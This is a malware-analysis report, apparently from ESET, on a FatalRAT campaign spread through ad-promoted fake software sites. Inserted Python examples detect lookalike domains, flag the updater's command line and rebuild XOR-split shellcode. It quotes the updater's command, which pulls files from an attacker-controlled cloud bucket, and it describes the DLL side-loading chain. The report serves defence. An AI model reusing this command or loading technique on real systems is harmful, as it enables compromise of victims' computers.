ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributed via malicious websites linked in ads that appear in Google search results
ESET researchers identified a malware campaign that targets Chinese-speaking people in Southeast and East Asia by buying misleading advertisements to appear in Google search results that lead to downloading trojanized installers. The unknown attackers created fake websites that look identical to those of popular applications such as Firefox, WhatsApp, or Telegram, but in addition to providing the legitimate software, also deliver FatalRAT, a remote access trojan that grants the attacker control of the victimized computer.
Figure 1 shows a heatmap with the countries where we detected the attacks between August 2022 and January 2023. Most of the attacks affected users in Taiwan, China and Hong Kong.
We also observed a small number of cases in:
A simplified overview of the attack is shown in Figure 2. A chain of multiple components ultimately installs the FatalRAT malware that was described by AT&T researchers (@attcyber) in August 2021.
The attackers registered various domain names that all pointed to the same IP address: a server hosting multiple websites that download trojanized software. Some of these websites look identical to their legitimate counterparts but deliver malicious installers instead. The other websites, possibly translated by the attackers, offer Chinese language versions of software that is not available in China, such as Telegram, as shown in Figure 3.
We observed malicious websites and installers for these applications, roughly in order of popularity:
Electrum Bitcoin wallet
Sogou Pinyin Method, a Chinese Pinyin input method editor
Youdao, a dictionary and translation application
WPS Office, a free office suite
You can see other fake websites in the gallery shown in Figure 4 (click on an image to enlarge it). Apart from electrumx[.]org, a fake website in English for the Electrum Bitcoin wallet, all the other websites are in Chinese, suggesting that the attackers are mostly targeting Chinese speakers.
Figure 4. Fake websites created by the attackers to deliver malicious installers (click to enlarge)
While in theory there are many possible ways that potential victims can be directed to these fake websites, a news site reported (English version here) that they were being shown an advertisement that led to one of these malicious websites when searching for the Firefox browser in Google. We couldn’t reproduce such search results, but believe that the ads were only served to users in the targeted region. An example is shown in Figure 5 (image from the original post above). We reported the websites to Google and the ads were taken down.
Given the fact that many of the domain names that the attackers registered for their websites are very similar to the legitimate domains, it is also possible that the attackers rely on typosquatting as well to attract potential victims to their websites. Some examples are:
telegraem[.]org (fake) vs. telegram.org (legitimate)
electrumx[.]org vs. electrum.org
youedao[.]com vs. youdao.com.
You’ll find the rest of the domain names that we observed in the IoCs section.
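The typosquatting pairs above are close enough to the legitimate names that a defender can screen DNS or proxy logs for them mechanically. This added example (not code from the ESET report) computes the edit distance between the second-level label of each observed domain and a watchlist of legitimate domains; the watchlist entries and the sample domains are the three pairs quoted above plus a constructed benign name.

```python
# Added example, not code from the ESET report: screen observed domains (e.g.
# from DNS or proxy logs) for names within a small edit distance of a watchlist
# of legitimate domains, the typosquatting pattern the report describes.

def levenshtein(a: str, b: str) -> int:
    """Edit distance allowing insertion, deletion and substitution."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]

def normalise(domain: str) -> str:
    """Lower-case and undo the defanged '[.]' notation used in reports."""
    return domain.lower().replace("[.]", ".")

def second_level_label(domain: str) -> str:
    parts = normalise(domain).split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

# Watchlist: the legitimate counterparts named in the report.
WATCHLIST = ["telegram.org", "electrum.org", "youdao.com"]

def find_lookalikes(observed, watchlist=WATCHLIST, max_distance=2):
    """Return (observed, legitimate, distance) triples for domains whose
    second-level label is close to, but not the same as, a watchlist name."""
    hits = []
    for dom in observed:
        norm = normalise(dom)
        if norm in watchlist:
            continue                       # exact legitimate domain, not a lookalike
        label = second_level_label(norm)
        for legit in watchlist:
            d = levenshtein(label, second_level_label(legit))
            if d <= max_distance:
                hits.append((norm, legit, d))
    return hits

# Constructed sample: the pairs quoted in the report plus a benign domain.
SAMPLE = ["telegraem[.]org", "electrumx[.]org", "youedao[.]com", "example.com"]

if __name__ == "__main__":
    for hit in find_lookalikes(SAMPLE):
        print("%s looks like %s (distance %d)" % hit)
```

A distance of 0 means the same label under a different TLD, which is worth a look for the same reason.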
The installers downloaded from the fake websites are not hosted on the same server as the websites, but in the Alibaba Cloud Object Storage Service. They are digitally signed MSI files (see the Certificates section) created with Advanced Installer. Figure 6 shows the malicious installers that the attackers uploaded to the cloud storage on January 6th, 2023.
When these installers are executed, they usually:
Drop and execute the malicious loader, and files needed to run the FatalRAT malware, in the %PROGRAMDATA%\Progtmy directory.
Drop the malicious updater and related files in the %PROGRAMDATA%\Progtmy directory.
Drop a file named ossutilconfig in the %USERPROFILE% directory. This file contains credentials used by the updater to connect to a remote bucket in the Alibaba Cloud.
Create an empty directory %PROGRAMDATA%\Progptp (although we observed some cases where the FatalRAT malware was installed in this directory instead).
Drop and execute the legitimate installer in C:\Program Files\Common Files (see CommonFiles64Folder).
Create scheduled tasks to execute the loader and updater components.
The malware is run by side-loading a malicious DLL, libpng13.dll, which is used by sccs.exe (Browser Support Module), a legitimate executable developed by Xunlei. The original libpng13.dll is also included in the installer package (renamed to what appears to be a random name) because the malicious DLL forwards its exported functions to the original DLL. Some of the forwarded exports in the malicious DLL are shown in Figure 7. The image shows that the original DLL was renamed to BHuedjhd.dll in this example and that the malicious DLL was compiled as Dll22.dll.
The malware updater is executed in a similar manner, by side-loading dr.dll, used by a legitimate, signed binary developed by Tencent. The malicious DLL is very simple and executes OSSUTIL (included in the installer package as ssu.exe) to download files from an attacker-controlled bucket in Alibaba Cloud. The command executed by the DLL is:
cmd /C "C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy --update"
This should update files in the %PROGRAMDATA%\Progtmy local directory from the remote bucket occ-a1 (a different bucket than the ones used to store the installers, but in the same account), but it doesn’t work in any of the installers that we analyzed because the %PROGRAMDATA%\Progtmy\2 subdirectory doesn’t exist (it should be subdirectory 0, created by the installer).
The attackers made the same mistake with the scheduled tasks created for the updater, as the execution path also refers to a subdirectory 2 that doesn’t exist. In most cases, four scheduled tasks are created: two for the RAT (one set to execute periodically and the other whenever any user logs into the PC) and two for the updater. The names of the tasks are based on the Windows build number and the name of the computer, as shown in Figure 8.
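The updater's command line is a compact detection opportunity: an ossutil-style copy from an oss:// bucket into %PROGRAMDATA%, wrapped in cmd /C. This added example (not code from the ESET report) checks constructed process-creation command lines for that combination of traits; the first sample is the command quoted above with its path separators restored, the others are constructed benign look-alikes.

```python
import re

# Added example, not code from the ESET report: flag process-creation command
# lines that match the updater's pattern, an ossutil-style "cp" from an oss://
# bucket into a directory under %PROGRAMDATA%, launched through cmd /C.

CMD_WRAPPER = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/c\b', re.I)
OSS_SOURCE = re.compile(r"\boss://[\w.-]+/\S*", re.I)
COPY_VERB = re.compile(r"\bcp\b", re.I)
PROGRAMDATA_PATH = re.compile(r"[a-z]:\\programdata\\[^\s\"]+", re.I)
UPDATE_FLAG = re.compile(r"(?:^|\s)--update\b", re.I)

def classify(cmdline: str) -> dict:
    """Return which of the updater's traits a single command line shows."""
    return {
        "cmd_wrapper": bool(CMD_WRAPPER.search(cmdline)),
        "oss_copy": bool(COPY_VERB.search(cmdline) and OSS_SOURCE.search(cmdline)),
        "programdata_path": bool(PROGRAMDATA_PATH.search(cmdline)),
        "update_flag": bool(UPDATE_FLAG.search(cmdline)),
    }

def is_alert(cmdline: str) -> bool:
    """Alert on a bucket-to-ProgramData copy. The cmd /C wrapper and --update
    raise confidence but are not required, so a direct ossutil call still fires."""
    traits = classify(cmdline)
    return traits["oss_copy"] and traits["programdata_path"]

def triage(events):
    """Return the indices of the events that should be alerted on."""
    return [i for i, e in enumerate(events) if is_alert(e)]

# Constructed sample events. The first is the command line quoted in the report
# (with path separators restored); the others are benign look-alikes.
SAMPLE_EVENTS = [
    r'cmd /C "C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy --update"',
    r'"C:\Program Files\ossutil\ossutil64.exe" ls oss://backup-bucket/',
    r'cmd /C "xcopy C:\ProgramData\App\cache C:\Temp\cache /s"',
]

if __name__ == "__main__":
    for i, e in enumerate(SAMPLE_EVENTS):
        print(i, is_alert(e), classify(e))
```

Pair the command-line match with the file artifacts the installer leaves (ossutilconfig in %USERPROFILE%, the Progtmy and Progptp directories) to confirm a hit on the host.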
The loader – libpng13.dll – is a very simple component that opens and executes in memory a file named Micr.jpg, located in the same directory as the DLL. The attackers have obfuscated the loader with many calls to a function that just prints some hardcoded values. It’s possible that this behavior was used to avoid being detected by security solutions or to complicate the analysis of the DLL.
Figure 9 shows an example of the obfuscated code on the left and the deobfuscated code on the right.
Micr.jpg is actually shellcode that also contains an embedded DLL. The purpose of this shellcode is to load and execute in memory the embedded DLL by calling an export function of the DLL named SignalChromeElf. Before the execution of this export function, the shellcode reconstructs the imports table of the DLL and calls the DllEntryPoint, which simply invokes the Windows API function DisableThreadLibraryCalls as a way to increase the stealthiness of the DLL.
SignalChromeElf essentially will decrypt, load, and execute an encrypted payload located in the embedded DLL. This encrypted payload is the FatalRAT malware, and after its decryption the DLL will find the address of an export function called SVP7, which contains the entry point of the malware, and call it, passing the encrypted configuration of FatalRAT as an argument.
The function in the embedded DLL that decrypts the payload is the same as the function used in FatalRAT to decrypt its configuration. An example of this function is shown in Figure 10.
FatalRAT is a remote access trojan documented in August 2021 by AT&T Alien Labs. This malware provides a set of functionalities to perform various malicious activities on a victim’s computer. As an example, the malware can:
Change the victim’s screen resolution
Terminate browser processes and steal or delete their stored data. The targeted browsers are:
Download and execute a file
Execute shell commands
This malware contains various checks to determine whether it’s running in a virtualized environment. Depending on its configuration, these checks may be executed or not.
From our own analysis we were able to determine that the FatalRAT version used in this campaign is very similar to the one documented by AT&T in their blogpost, so we won’t go into more details. A comparison of them is shown in Figure 11, and Figure 10 shows the decompiled code used to decrypt strings in the FatalRAT samples from this campaign, which is the same as the one described by AT&T.
We found a previous version of the malicious installer that the attackers have used since at least May 2022. Unlike the installers that we described previously, this version contains an XOR-encrypted payload, divided into three files: Micr.flv, Micr2.flv, and Micr3.flv, each file encrypted with a different, single byte XOR key. Once decrypted, the content of the three files is concatenated, forming shellcode that contacts a C&C server to download and execute further shellcode.
The loader DLL in this case is named dr.dll – the same name that is used for the update mechanism in later versions of the installer, side-loaded by the same legitimate executable. Given that this older version doesn’t seem to have an updater, we believe that the attackers have replaced it with the new version of the installer since August 2022.
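For an analyst holding the three encrypted files from the older installer, the practical task is recovering the three keys and rebuilding the shellcode. This added example (not code from the ESET report) does that under one stated assumption: the plaintext's most frequent byte is 0x00, which is usual for position-independent code padded with embedded data, so the most frequent ciphertext byte reveals each single-byte key. The fragments and keys are constructed stand-ins, not the campaign's files.

```python
from collections import Counter
from typing import Sequence

# Added example, not code from the ESET report: recover the three single-byte
# XOR keys of a split payload (Micr.flv, Micr2.flv, Micr3.flv) and rebuild the
# concatenated shellcode for analysis. The key guess assumes 0x00 is the most
# frequent plaintext byte, so the most frequent ciphertext byte equals the key.

def guess_single_byte_key(blob: bytes) -> int:
    """Most frequent ciphertext byte; equals the key when plaintext mode is 0x00."""
    byte, _ = Counter(blob).most_common(1)[0]
    return byte

def xor_with(blob: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in blob)

def rebuild_payload(parts: Sequence[bytes], keys=None):
    """Decrypt each part with its own key (guessed when not supplied) and join
    the parts in order. Returns (shellcode, keys_used)."""
    used = list(keys) if keys is not None else [guess_single_byte_key(p) for p in parts]
    if len(used) != len(parts):
        raise ValueError("one key per part is required")
    return b"".join(xor_with(p, k) for p, k in zip(parts, used)), used

# Constructed stand-ins for the three files: short code-like prefixes followed
# by zero padding so the frequency heuristic applies, each under its own key.
FRAGMENTS = [
    b"\x55\x48\x89\xe5\x48\x83" + b"\x00" * 24,
    b"\x48\x31\xc9\x65\x48\x8b" + b"\x00" * 24,
    b"\x00" * 16 + b"\x41\x42\x43\x44",
]
TRUE_KEYS = [0x5a, 0xa7, 0x3c]
ENCRYPTED = [xor_with(f, k) for f, k in zip(FRAGMENTS, TRUE_KEYS)]

if __name__ == "__main__":
    code, keys = rebuild_payload(ENCRYPTED)
    print([hex(k) for k in keys], code[:8].hex())
```

If a fragment is dense code with few zero bytes, the heuristic can miss; pass the keys explicitly once they are confirmed from the loader's decryption routine.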
Twitter user Jirehlov Solace reported other versions of the installers starting in May 2022, as can be seen in this thread. Although some of those installers are the same as ones in this report, it seems that most of them are different, compiled as EXE files (not MSI installers) and using a variety of software packers. Those samples are probably connected with Operation Dragon Breath as described by Qi An Xin in May 2022.
The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible. The fake websites are, in most cases, identical copies of the legitimate sites. As for the trojanized installers, they install the actual application that the user was interested in, avoiding suspicion of a possible compromise on the victim’s machine. For all of these reasons, we see how important it is to diligently check the URL that we are visiting before we download software. Even better, type it into your browser’s address bar after checking that it is the actual vendor site.
Since the malware used in this campaign, FatalRAT, contains various commands used to manipulate data from different browsers, and the victimology is not focused on a particular type of user, anyone can be affected. It is possible that the attackers are solely interested in the theft of information like web credentials to sell them on underground forums or to use them for another type of crimeware campaign, but for now specific attribution of this campaign to a known or new threat actor is not possible.
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
MITRE ATT&CK techniques
This table was built using version 12 of the MITRE ATT&CK framework.
Tactic | ID | Name | Description
Resource Development | T1583.001 | Acquire Infrastructure: Domains | The attackers acquired domain names for their malicious websites and C&C servers.
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server | The attackers acquired VPS servers to store their malicious websites.
Resource Development | T1585.003 | Establish Accounts: Cloud Accounts | The attackers acquired accounts in Alibaba Cloud Object Storage Service to host their malicious MSI installers.
Resource Development | T1608.001 | Stage Capabilities: Upload Malware | The attackers uploaded their malicious MSI files to Alibaba Cloud Object Storage Service.
Resource Development | T1587.002 | Develop Capabilities: Code Signing Certificates | The attackers used self-signed certificates to sign their malicious MSI installers.
Initial Access | T1189 | Drive-by Compromise | The attackers used Google Ads to direct their victims to their malicious websites.
Execution | T1204.002 | User Execution: Malicious File | The attackers have relied on their victims to execute the malicious MSI installers.
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The malware updater uses cmd.exe to download files from Alibaba Cloud Object Storage Service.
Execution | T1106 | Native API | The loaders use API calls such as VirtualAlloc to load and execute malicious components into memory.
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | The MSI installers create scheduled tasks to achieve persistence.
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | FatalRAT creates a registry Run key to achieve persistence.
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | The loaders and FatalRAT component use various encryption algorithms to hide payloads and strings.
Defense Evasion | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | The loaders use dynamic API resolution to avoid detection.
Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | The attackers have used DLL side-loading to execute their malicious payloads.
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks | FatalRAT performs various checks to detect whether it’s running on a virtual machine.
Defense Evasion | T1027.009 | Obfuscated Files or Information: Embedded Payloads | The Micr.jpg file contains shellcode and an embedded DLL file that loads FatalRAT.
Defense Evasion | T1553.002 | Subvert Trust Controls: Code Signing | The attackers have used self-signed certificates to sign their malicious MSI files.
Collection | T1056.001 | Input Capture: Keylogging | FatalRAT has keylogger functionalities.
Collection | T1119 | Automated Collection | FatalRAT automatically collects information from a compromised machine and sends it to the C&C server.
Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | FatalRAT encrypts data with a custom encryption algorithm before it is sent to the C&C server.
Command and Control | T1095 | Non-Application Layer Protocol | FatalRAT uses TCP for C&C communications.
Exfiltration | T1020 | Automated Exfiltration | FatalRAT automatically sends information from a compromised machine to its C&C.
Exfiltration | T1041 | Exfiltration Over C2 Channel | FatalRAT exfiltrates data over the same channel used for C&C.